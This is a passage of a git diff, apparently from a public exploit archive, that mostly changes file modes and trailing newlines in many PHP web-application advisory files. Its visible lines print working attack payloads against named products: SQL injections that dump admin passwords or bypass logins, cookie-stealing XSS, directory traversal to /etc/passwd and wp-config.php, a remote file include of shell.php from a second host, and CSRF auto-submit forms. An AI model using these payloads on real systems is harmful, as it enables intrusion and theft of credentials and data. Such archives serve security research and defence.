+http://www.example.com/videos/wp-content/plugins/mukioplayer-for-wordpress/php-scripts/get.php?cid=71866877%27 \ No newline at end of file diff --git a/platforms/php/webapps/38756.txt b/platforms/php/webapps/38756.txt old mode 100755 new mode 100644 index 498a93118..24228ebb3 --- a/platforms/php/webapps/38756.txt +++ b/platforms/php/webapps/38756.txt @@ -12,4 +12,4 @@ Attackers can exploit these issues to obtain sensitive information, upload arbit http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http:// http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://www.example.com/big_file&h=1&w=1 -http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://www.example2.com/shell.php \ No newline at end of file +http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://www.example2.com/shell.php \ No newline at end of file diff --git a/platforms/php/webapps/38757.txt b/platforms/php/webapps/38757.txt old mode 100755 new mode 100644 index 232cca1d0..b1a9e61ee --- a/platforms/php/webapps/38757.txt +++ b/platforms/php/webapps/38757.txt @@ -17,4 +17,4 @@ http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http:// http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://www.example.com/big_file&h=1&w=1 -http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://www.example2.com/shell.php \ No newline at end of file +http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://www.example2.com/shell.php \ No newline at end of file diff --git a/platforms/php/webapps/3876.txt b/platforms/php/webapps/3876.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38765.txt b/platforms/php/webapps/38765.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38767.txt b/platforms/php/webapps/38767.txt old mode 100755 new mode 100644 index 66a094530..cb8c67aec --- a/platforms/php/webapps/38767.txt +++ b/platforms/php/webapps/38767.txt @@ -19,4 +19,4 @@ http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/shell.php -http://www.example.com/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php \ No newline at end of file +http://www.example.com/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php \ No newline at end of file diff --git a/platforms/php/webapps/38768.txt b/platforms/php/webapps/38768.txt old mode 100755 new mode 100644 index 478580e0d..890b4510a --- a/platforms/php/webapps/38768.txt +++ b/platforms/php/webapps/38768.txt @@ -15,4 +15,4 @@ http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http:// http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example1.com/big_file&h=1&w=1 -http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example2.com/shell.php \ No newline at end of file +http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example2.com/shell.php \ No newline at end of file diff --git a/platforms/php/webapps/38769.txt b/platforms/php/webapps/38769.txt old mode 100755 new mode 100644 index 81aedf3e1..8acc8dd0a --- a/platforms/php/webapps/38769.txt +++ b/platforms/php/webapps/38769.txt @@ -16,4 +16,4 @@ Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* -login=-1' or 85 = '83&login_submit=Enter&password=lincoln.dll \ No newline at end of file +login=-1' or 85 = '83&login_submit=Enter&password=lincoln.dll \ No newline at end of file diff --git a/platforms/php/webapps/38770.txt b/platforms/php/webapps/38770.txt old mode 100755 new mode 100644 index 495670ed2..cf49b07b0 --- a/platforms/php/webapps/38770.txt +++ b/platforms/php/webapps/38770.txt @@ -4,4 +4,4 @@ MentalJS is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks. -http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E \ No newline at end of file +http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/38777.txt b/platforms/php/webapps/38777.txt old mode 100755 new mode 100644 index 188efb8d2..05c037ef4 --- a/platforms/php/webapps/38777.txt +++ b/platforms/php/webapps/38777.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc JVideoClip 1.5.1 is vulnerable; other versions may also be affected. -http://www.example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6 \ No newline at end of file +http://www.example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6 \ No newline at end of file diff --git a/platforms/php/webapps/3878.txt b/platforms/php/webapps/3878.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38780.txt b/platforms/php/webapps/38780.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38781.txt b/platforms/php/webapps/38781.txt old mode 100755 new mode 100644 index c9d04b9aa..d2074c4a0 --- a/platforms/php/webapps/38781.txt +++ b/platforms/php/webapps/38781.txt @@ -8,4 +8,4 @@ Open Source SIEM (OSSIM) 4.3.0 and prior are vulnerable. http://www.example.com/RadarReport/radar-iso27001-potential.php?date_from=%Inject_Here% -http://www.example.com/RadarReport/radar-iso27001-A12IS_acquisition-pot.php?date_from=%Inject_Here% \ No newline at end of file +http://www.example.com/RadarReport/radar-iso27001-A12IS_acquisition-pot.php?date_from=%Inject_Here% \ No newline at end of file diff --git a/platforms/php/webapps/38782.php b/platforms/php/webapps/38782.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38783.php b/platforms/php/webapps/38783.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38784.txt b/platforms/php/webapps/38784.txt old mode 100755 new mode 100644 index def5ee10e..8129db952 --- a/platforms/php/webapps/38784.txt +++ b/platforms/php/webapps/38784.txt @@ -6,4 +6,4 @@ Exploiting this issue can allow an attacker to gain access to arbitrary system f Open Source SIEM (OSSIM) 4.3.3 is vulnerable; other versions may also be affected. -http://www.example.com/ossim/ocsreports/tele_compress.php?timestamp=../../../../etc/ossim \ No newline at end of file +http://www.example.com/ossim/ocsreports/tele_compress.php?timestamp=../../../../etc/ossim \ No newline at end of file diff --git a/platforms/php/webapps/38786.txt b/platforms/php/webapps/38786.txt old mode 100755 new mode 100644 index 1a0520e35..f135c6675 --- a/platforms/php/webapps/38786.txt +++ b/platforms/php/webapps/38786.txt @@ -4,4 +4,4 @@ Ziteman CMS is prone to an SQL-injection vulnerability because it fails to suffi Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/admincss/default.asp \ No newline at end of file +http://www.example.com/admincss/default.asp \ No newline at end of file diff --git a/platforms/php/webapps/3879.htm b/platforms/php/webapps/3879.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38799.txt b/platforms/php/webapps/38799.txt old mode 100755 new mode 100644 index 8aec9a69c..f2224066d --- a/platforms/php/webapps/38799.txt +++ b/platforms/php/webapps/38799.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc http://example.com/auth.php (POST - user_id) -user_id=-1' or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' \ No newline at end of file +user_id=-1' or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' \ No newline at end of file diff --git a/platforms/php/webapps/38800.txt b/platforms/php/webapps/38800.txt old mode 100755 new mode 100644 index 7d840a127..f4ff9aa3a --- a/platforms/php/webapps/38800.txt +++ b/platforms/php/webapps/38800.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to execute arbitrary code in the context of t FreeSMS 2.1.2 is vulnerable; other versions may also be affected. -http://www.example.com/freesms/pages/crc_handler.php?method=evaluation&func=getanswers&scheduleid=15{SQL_HERE} \ No newline at end of file +http://www.example.com/freesms/pages/crc_handler.php?method=evaluation&func=getanswers&scheduleid=15{SQL_HERE} \ No newline at end of file diff --git a/platforms/php/webapps/38801.txt b/platforms/php/webapps/38801.txt old mode 100755 new mode 100644 index e80beb3c6..664969551 --- a/platforms/php/webapps/38801.txt +++ b/platforms/php/webapps/38801.txt @@ -9,4 +9,4 @@ FreeSMS 2.1.2 is vulnerable; other versions may also be affected. http://www.example.com/freesms/pages/crc_handler.php?method=profile&func=%3Cscript%3Ealert%28123%29%3C/script%3E http://www.example.com/FreeSMS/pages/crc_evaluation.php?crc=diggks5j3mlf6pee6knk34qq60&uid=3&course='"</script><script>alert(document.cookie)</script> http://www.example.com/FreeSMS/pages/crc_login.php?crc=diggks5j3mlf6pee6knk34qq60&uid='"</script><script>alert(document.cookie)</script> -http://www.example.com/FreeSMS/pages/crc_handler.php?method=register&func=add -> Username -> '"</script><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/FreeSMS/pages/crc_handler.php?method=register&func=add -> Username -> '"</script><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/38803.txt b/platforms/php/webapps/38803.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38808.txt b/platforms/php/webapps/38808.txt old mode 100755 new mode 100644 index d88727f8c..1d964755d --- a/platforms/php/webapps/38808.txt +++ b/platforms/php/webapps/38808.txt @@ -5,4 +5,4 @@ WP-Realty plugin for WordPress is prone to an SQL-injection vulnerability becaus A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi] -http://www.example.com/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi \ No newline at end of file diff --git a/platforms/php/webapps/38811.txt b/platforms/php/webapps/38811.txt old mode 100755 new mode 100644 index 0012c7d0a..688a138ef --- a/platforms/php/webapps/38811.txt +++ b/platforms/php/webapps/38811.txt @@ -4,4 +4,4 @@ The Daily Deal theme is prone to a vulnerability that lets attackers upload arbi An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. -http://www.example.com/wp-content/themes/DailyDeal/monetize/upload/ \ No newline at end of file +http://www.example.com/wp-content/themes/DailyDeal/monetize/upload/ \ No newline at end of file diff --git a/platforms/php/webapps/38814.php b/platforms/php/webapps/38814.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38819.txt b/platforms/php/webapps/38819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38820.php b/platforms/php/webapps/38820.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38828.php b/platforms/php/webapps/38828.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38830.txt b/platforms/php/webapps/38830.txt old mode 100755 new mode 100644 index 1f6dbb2ba..881483d76 --- a/platforms/php/webapps/38830.txt +++ b/platforms/php/webapps/38830.txt @@ -20,4 +20,4 @@ ###################### # Discovered by : # Mojtaba MobhaM & T3NZOG4N (t3nz0g4n@yahoo.com) -###################### \ No newline at end of file +###################### \ No newline at end of file diff --git a/platforms/php/webapps/38831.txt b/platforms/php/webapps/38831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38837.txt b/platforms/php/webapps/38837.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3884.txt b/platforms/php/webapps/3884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38841.txt b/platforms/php/webapps/38841.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38842.txt b/platforms/php/webapps/38842.txt old mode 100755 new mode 100644 index 76998f559..e9ef5c73f --- a/platforms/php/webapps/38842.txt +++ b/platforms/php/webapps/38842.txt @@ -7,4 +7,4 @@ An attacker can exploit these issues by manipulating the SQL query logic to carr Testa OTMS 2.0.0.2 is vulnerable; other version may also be vulnerable. http://www.example.com /?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ -http://www.example.com/test/admin/index.php \ No newline at end of file +http://www.example.com/test/admin/index.php \ No newline at end of file diff --git a/platforms/php/webapps/38843.txt b/platforms/php/webapps/38843.txt old mode 100755 new mode 100644 index c1fee4a23..182d0c66b --- a/platforms/php/webapps/38843.txt +++ b/platforms/php/webapps/38843.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor TomatoCart 1.1.8.2 is vulnerable; other versions may also be affected. -http://www.example.com//install/rpc.php?action=dbCheck&class=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg \ No newline at end of file +http://www.example.com//install/rpc.php?action=dbCheck&class=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg \ No newline at end of file diff --git a/platforms/php/webapps/38844.html b/platforms/php/webapps/38844.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38848.php b/platforms/php/webapps/38848.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3885.txt b/platforms/php/webapps/3885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38855.txt b/platforms/php/webapps/38855.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38856.txt b/platforms/php/webapps/38856.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38861.txt b/platforms/php/webapps/38861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38862.txt b/platforms/php/webapps/38862.txt old mode 100755 new mode 100644 index 259d49c93..d7bde7981 --- a/platforms/php/webapps/38862.txt +++ b/platforms/php/webapps/38862.txt @@ -15,4 +15,4 @@ Pragma: no-cache Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 180 -thisday=20131012') and UTL_INADDR.get_host_name((select v from (select rownum,USER_NAME||chr(94)||PASS_WORD v from TN_USER WHERE USER_ID=1) where rownum=1))>0--&cx.y=16&querytype= \ No newline at end of file +thisday=20131012') and UTL_INADDR.get_host_name((select v from (select rownum,USER_NAME||chr(94)||PASS_WORD v from TN_USER WHERE USER_ID=1) where rownum=1))>0--&cx.y=16&querytype= \ No newline at end of file diff --git a/platforms/php/webapps/38863.php b/platforms/php/webapps/38863.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38864.php b/platforms/php/webapps/38864.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38865.txt b/platforms/php/webapps/38865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38867.txt b/platforms/php/webapps/38867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38868.txt b/platforms/php/webapps/38868.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38869.txt b/platforms/php/webapps/38869.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38870.txt b/platforms/php/webapps/38870.txt old mode 100755 new mode 100644 index 719c0407e..939d9da7a --- a/platforms/php/webapps/38870.txt +++ b/platforms/php/webapps/38870.txt @@ -4,4 +4,4 @@ WordPress Easy Career Openings plugin for WordPress is prone to an SQL-injection Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/career-details/?jobid=3'[Sql Injection] \ No newline at end of file +http://www.example.com/career-details/?jobid=3'[Sql Injection] \ No newline at end of file diff --git a/platforms/php/webapps/38872.php b/platforms/php/webapps/38872.php old mode 100755 new mode 100644 index 733e5894b..7521e0a60 --- a/platforms/php/webapps/38872.php +++ b/platforms/php/webapps/38872.php @@ -16,4 +16,4 @@ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/38873.txt b/platforms/php/webapps/38873.txt old mode 100755 new mode 100644 index 3937ab7ce..af0d2862f --- a/platforms/php/webapps/38873.txt +++ b/platforms/php/webapps/38873.txt @@ -6,4 +6,4 @@ A remote attacker could exploit the vulnerability using directory-traversal char eduTrac 1.1.1 is vulnerable; other versions may also be affected. -http://www.example.com/installer/overview.php?step=writeconfig&showmask=../../eduTrac/Config/constants.php \ No newline at end of file +http://www.example.com/installer/overview.php?step=writeconfig&showmask=../../eduTrac/Config/constants.php \ No newline at end of file diff --git a/platforms/php/webapps/38874.txt b/platforms/php/webapps/38874.txt old mode 100755 new mode 100644 index 5504b0861..f656fbf1d --- a/platforms/php/webapps/38874.txt +++ b/platforms/php/webapps/38874.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc http://example.com/user.php (POST - blog) -blog='+(SELECT 1 FROM (SELECT SLEEP(25))A)+' \ No newline at end of file +blog='+(SELECT 1 FROM (SELECT SLEEP(25))A)+' \ No newline at end of file diff --git a/platforms/php/webapps/38875.php b/platforms/php/webapps/38875.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38876.txt b/platforms/php/webapps/38876.txt old mode 100755 new mode 100644 index 8337f0784..f3018a3c1 --- a/platforms/php/webapps/38876.txt +++ b/platforms/php/webapps/38876.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues by manipulating the SQL query logic to carr EtoShop C2C Forward Auction Creator 2.0; other version may also be vulnerable. -http://www.example.com/C2CForwardAuction/auction/asp/list.asp?pa=[SQL INJECTION] \ No newline at end of file +http://www.example.com/C2CForwardAuction/auction/asp/list.asp?pa=[SQL INJECTION] \ No newline at end of file diff --git a/platforms/php/webapps/38877.txt b/platforms/php/webapps/38877.txt old mode 100755 new mode 100644 index 078a584a8..94f3fdfde --- a/platforms/php/webapps/38877.txt +++ b/platforms/php/webapps/38877.txt @@ -9,4 +9,4 @@ EtoShop C2C Forward Auction Creator 2.0; other version may also be vulnerable. www.example.com/demo/C2CForwardAuction/auction/casp/admin.asp UserID : x' or ' 1=1-- -Password : x' or ' 1=1-- \ No newline at end of file +Password : x' or ' 1=1-- \ No newline at end of file diff --git a/platforms/php/webapps/38880.txt b/platforms/php/webapps/38880.txt old mode 100755 new mode 100644 index d97eb15dd..388348f68 --- a/platforms/php/webapps/38880.txt +++ b/platforms/php/webapps/38880.txt @@ -4,4 +4,4 @@ Veno File Manager is prone to a vulnerability that lets attackers download arbit An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks. -http://www.example.com/filemanager/vfm-admin/vfm-downloader.php?q=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== \ No newline at end of file +http://www.example.com/filemanager/vfm-admin/vfm-downloader.php?q=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== \ No newline at end of file diff --git a/platforms/php/webapps/38881.html b/platforms/php/webapps/38881.html old mode 100755 new mode 100644 index d4641df3f..d05c77c90 --- a/platforms/php/webapps/38881.html +++ b/platforms/php/webapps/38881.html @@ -22,4 +22,4 @@ id="formid" method="post"> document.getElementById('formid').submit(); </script> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/php/webapps/38885.txt b/platforms/php/webapps/38885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38886.txt b/platforms/php/webapps/38886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38887.txt b/platforms/php/webapps/38887.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38888.txt b/platforms/php/webapps/38888.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38889.txt b/platforms/php/webapps/38889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38890.txt b/platforms/php/webapps/38890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38891.txt b/platforms/php/webapps/38891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38892.txt b/platforms/php/webapps/38892.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38895.txt b/platforms/php/webapps/38895.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38901.txt b/platforms/php/webapps/38901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38902.txt b/platforms/php/webapps/38902.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38906.txt b/platforms/php/webapps/38906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38907.txt b/platforms/php/webapps/38907.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38908.txt b/platforms/php/webapps/38908.txt old mode 100755 new mode 100644 index fcedb78c9..1bae3b552 --- a/platforms/php/webapps/38908.txt +++ b/platforms/php/webapps/38908.txt @@ -4,4 +4,4 @@ Leed is prone to an SQL-injection vulnerability. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/leed/action.php?action=removeFolder&id=[SQL Injection] \ No newline at end of file +http://www.example.com/leed/action.php?action=removeFolder&id=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/38915.txt b/platforms/php/webapps/38915.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38919.txt b/platforms/php/webapps/38919.txt old mode 100755 new mode 100644 index d14a5eeac..a5cc26d9e --- a/platforms/php/webapps/38919.txt +++ b/platforms/php/webapps/38919.txt @@ -4,4 +4,4 @@ JForum is prone to a cross-site request-forgery vulnerability because the applic Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible. -http://www.example.com/forum/admBase/login.page?action=groupsSave&module=adminUsers&user_id=12696&groups=2 \ No newline at end of file +http://www.example.com/forum/admBase/login.page?action=groupsSave&module=adminUsers&user_id=12696&groups=2 \ No newline at end of file diff --git a/platforms/php/webapps/38920.txt b/platforms/php/webapps/38920.txt old mode 100755 new mode 100644 index 3a8bc4a13..6ad7e2972 --- a/platforms/php/webapps/38920.txt +++ b/platforms/php/webapps/38920.txt @@ -4,4 +4,4 @@ AFCommerce is prone to multiple remote file-include vulnerabilities because it f An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/afcontrol/adblock.php?rootpathtocart=[RFI] \ No newline at end of file +http://www.example.com/afcontrol/adblock.php?rootpathtocart=[RFI] \ No newline at end of file diff --git a/platforms/php/webapps/38921.txt b/platforms/php/webapps/38921.txt old mode 100755 new mode 100644 index 4f7f27ebd..972ff56df --- a/platforms/php/webapps/38921.txt +++ b/platforms/php/webapps/38921.txt @@ -4,4 +4,4 @@ AFCommerce is prone to multiple remote file-include vulnerabilities because it f An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/afcontrol/adminpassword.php?rootpathtocart=[RFI] \ No newline at end of file +http://www.example.com/afcontrol/adminpassword.php?rootpathtocart=[RFI] \ No newline at end of file diff --git a/platforms/php/webapps/38922.txt b/platforms/php/webapps/38922.txt old mode 100755 new mode 100644 index cbff3a0c8..2dea5e2e0 --- a/platforms/php/webapps/38922.txt +++ b/platforms/php/webapps/38922.txt @@ -4,4 +4,4 @@ AFCommerce is prone to multiple remote file-include vulnerabilities because it f An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/afcontrol/controlheader.php?rootpathtocart=[RFI] \ No newline at end of file +http://www.example.com/afcontrol/controlheader.php?rootpathtocart=[RFI] \ No newline at end of file diff --git a/platforms/php/webapps/38924.txt b/platforms/php/webapps/38924.txt old mode 100755 new mode 100644 index c41f90868..512c4bd2a --- a/platforms/php/webapps/38924.txt +++ b/platforms/php/webapps/38924.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow a remote attacker to perform certain unauthorize WordPress 2.0.11 is vulnerable. -http://www.example.com/wp-admin/options-discussion.php?action=retrospam&move=true&ids=1 \ No newline at end of file +http://www.example.com/wp-admin/options-discussion.php?action=retrospam&move=true&ids=1 \ No newline at end of file diff --git a/platforms/php/webapps/38927.txt b/platforms/php/webapps/38927.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38928.txt b/platforms/php/webapps/38928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38936.txt b/platforms/php/webapps/38936.txt old mode 100755 new mode 100644 index 9ac8c32b4..41d2d21d9 --- a/platforms/php/webapps/38936.txt +++ b/platforms/php/webapps/38936.txt @@ -6,4 +6,4 @@ Exploiting this issue can allow an attacker to obtain sensitive information that Advanced Dewplayer 1.2 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php \ No newline at end of file +http://www.example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php \ No newline at end of file diff --git a/platforms/php/webapps/38938.txt b/platforms/php/webapps/38938.txt old mode 100755 new mode 100644 index e43f7cb01..41a9c73e8 --- a/platforms/php/webapps/38938.txt +++ b/platforms/php/webapps/38938.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor xBoard 5.0, 5.5, and 6.0 are vulnerable. -http://www.example.com/xboard/view.php?post=[LFI] \ No newline at end of file +http://www.example.com/xboard/view.php?post=[LFI] \ No newline at end of file diff --git a/platforms/php/webapps/3894.txt b/platforms/php/webapps/3894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38941.txt b/platforms/php/webapps/38941.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38942.txt b/platforms/php/webapps/38942.txt old mode 100755 new mode 100644 index 99ab519da..c97306c64 --- a/platforms/php/webapps/38942.txt +++ b/platforms/php/webapps/38942.txt @@ -8,4 +8,4 @@ SPAMINA Cloud Email Firewall 3.3.1.1 is vulnerable; other versions may also be a https://www.example.com/?action=showHome&language=../../../../../../../../../../etc/passwd%00.jpg https://www.example.com/multiadmin/js/lib/?action=../../../../../../../../../../etc/passwd&language=de -https://www.example.com/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg \ No newline at end of file +https://www.example.com/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg \ No newline at end of file diff --git a/platforms/php/webapps/38943.txt b/platforms/php/webapps/38943.txt old mode 100755 new mode 100644 index 3bba12872..3a61bd88f --- a/platforms/php/webapps/38943.txt +++ b/platforms/php/webapps/38943.txt @@ -4,4 +4,4 @@ The Aclsfgpl component for Joomla! is prone to a vulnerability that lets attacke An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. -http://www.example.com/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form \ No newline at end of file +http://www.example.com/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form \ No newline at end of file diff --git a/platforms/php/webapps/38944.txt b/platforms/php/webapps/38944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38945.txt b/platforms/php/webapps/38945.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38946.txt b/platforms/php/webapps/38946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38947.txt b/platforms/php/webapps/38947.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38948.txt b/platforms/php/webapps/38948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38949.txt b/platforms/php/webapps/38949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3895.txt b/platforms/php/webapps/3895.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38950.txt b/platforms/php/webapps/38950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38951.txt b/platforms/php/webapps/38951.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38952.txt b/platforms/php/webapps/38952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38953.txt b/platforms/php/webapps/38953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38954.txt b/platforms/php/webapps/38954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38955.txt b/platforms/php/webapps/38955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38956.txt b/platforms/php/webapps/38956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38957.html b/platforms/php/webapps/38957.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38958.html b/platforms/php/webapps/38958.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38965.txt 